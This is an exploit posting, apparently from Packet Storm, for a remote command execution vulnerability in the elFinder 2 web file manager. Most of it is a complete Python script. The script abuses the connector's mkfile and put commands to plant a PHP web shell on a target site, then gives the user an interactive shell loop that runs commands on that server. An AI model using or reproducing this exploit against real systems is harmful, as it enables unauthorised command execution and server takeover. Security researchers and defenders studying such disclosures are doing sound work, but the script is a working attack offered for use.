elFinder 2 suffers from a remote command execution vulnerability via file creation.
57884d86d295df818f1cab870ceaf073323f6d2bc260384a3aeccee8ff36816f#[+] Author: TUNISIAN CYBER
#[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability
#[+] Date: 06-05-2015
#[+] Vendor: https://github.com/Studio-42/elFinder
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Time Line:
# 03-05-2015:Vulnerability Discovered
# 03-05-2015:Contacted Vendor
# 04-05-2015:No response
# 05-05-2015:No response
# 06-05-2015:No response
# 06-05-2015:Vulnerability published
import cookielib, urllib
import urllib2
import sys
print"\x20\x20+-------------------------------------------------+"
print"\x20\x20| elFinder Remote Command Execution Vulnerability |"
print"\x20\x20| TUNISIAN CYBER |"
print"\x20\x20+-------------------------------------------------+"
host = raw_input('\x20\x20Vulnerable Site:')
evilfile = raw_input('\x20\x20EvilFileName:')
path=raw_input('\x20\x20elFinder s Path:')
tcyber = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber))
create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw')
#print create.read()
payload = urllib.urlencode({
'cmd' : 'put',
'target' : 'l1_'+evilfile.encode('base64','strict'),
'content' : '<?php passthru($_GET[\'cmd\']); ?>'
})
write = opener.open('http://'+host+'/'+path+'/php/connector.php', payload)
#print write.read()
print '\n'
while True:
try:
cmd = raw_input('[She3LL]:~# ')
execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
print reverse;
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed